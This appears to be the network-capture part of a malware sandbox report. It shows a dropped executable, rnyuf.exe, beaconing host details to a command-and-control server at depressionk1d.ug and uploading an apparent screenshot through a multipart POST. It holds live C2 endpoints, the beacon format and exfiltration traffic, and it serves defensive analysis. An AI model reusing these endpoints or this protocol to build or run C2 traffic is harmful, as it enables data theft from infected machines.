                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:18.828968048 CET14461INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:18 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          306192.168.2.450132178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:18.969333887 CET14461OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:18.997863054 CET14462INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:18 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          307192.168.2.450133178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:19.141068935 CET14462OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:19.169012070 CET14463INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:19 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          308192.168.2.450134178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:19.310211897 CET14463OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:19.332751989 CET14465INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:19 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:19.335299015 CET14465INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          309192.168.2.450135178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:19.467593908 CET14466OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:19.490098953 CET14467INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:19 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:19.490113974 CET14467INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->
                          Nov 12, 2021 22:24:19.574732065 CET14468OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:19.574960947 CET14468OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:19.575303078 CET14478OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:19.575453997 CET14480OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:19.597718954 CET14486OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:19.597820044 CET14497OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:19.597867012 CET14507OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:24:19.620440006 CET14513OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:24:19.620588064 CET14534OUTData Raw: f2 17 b7 ff 00 7a 9f aa 1f f8 9a 5c 7f be 6a 3d 1b fe 42 f6 ff 00 ef 53 b5 13 9d 46 7f f7 cd 72 5b f7 ff 00 23 59 7f 07 e6 56 a4 ef 45 15 b9 ca 2d 14 94 b4 00 52 d2 52 f6 a0 40 29 69 29 69 08 29 45 25 28 a0 41 40 a2 81 48 07 03 4a 29 29 45 21 31
                          Data Ascii: z\j=BSFr[#YVE-RR@)i)i)E%(A@HJ))E!1)"Wm$*PvxEz^^<CW6_9z1z=x'KtVNkQ<i/Vk~B4WIqNQZVCZxsPNE&LsR@)i)"5Tp5
                          Nov 12, 2021 22:24:19.620743990 CET14539OUTData Raw: 2b c0 6b dd be 03 de 5a da 78 7f 56 fb 4d cc 30 ee ba 5d be 6c 81 73 84 e7 19 ac 2b fc 06 b4 7e 23 9f ff 00 84 73 5c ff 00 a0 2e a3 ff 00 80 af fe 14 a3 c3 ba ea b0 61 a3 ea 40 83 90 45 ab f1 fa 57 bb ff 00 6c 69 9f f4 12 b3 ff 00 c0 84 ff 00 1a
                          Data Ascii: +kZxVM0]ls+~#s\.a@EWliO/v_]U?Y'Wwe)IdePLmZ5EU?AK/O>2eT6u<KSjV:wwje;j@S%-4&wN5X%WxP2
                          Nov 12, 2021 22:24:19.620790005 CET14559OUTData Raw: 6a 64 f3 0c c5 2e 2a 50 86 94 25 04 f3 11 81 4f 02 9e 14 53 c0 5a 64 b9 11 85 a7 84 a7 82 a3 bd 1e 6a 0f e2 14 10 db 62 04 a7 04 a6 9b 98 87 f1 52 7d b6 31 d3 9a 77 42 e5 9b e8 4c 12 94 25 56 37 cb d8 53 7e da 4f 41 45 c3 d9 cc bd b7 14 a0 56 7f
                          Data Ascii: jd.*P%OSZdjbR}1wBL%V7S~OAEVD+RQVW1=w}ExURQa{"h[sFM7w9J~7xqBhh$\kc%5X5.w/YsFr-IM}b]\G
                          Nov 12, 2021 22:24:19.669600010 CET14577INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:19 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          31192.168.2.449815178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:27.735651970 CET3782OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:27.735729933 CET3782OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:27.735912085 CET3792OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:27.736035109 CET3795OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:27.758775949 CET3821OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:27.781544924 CET3827OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
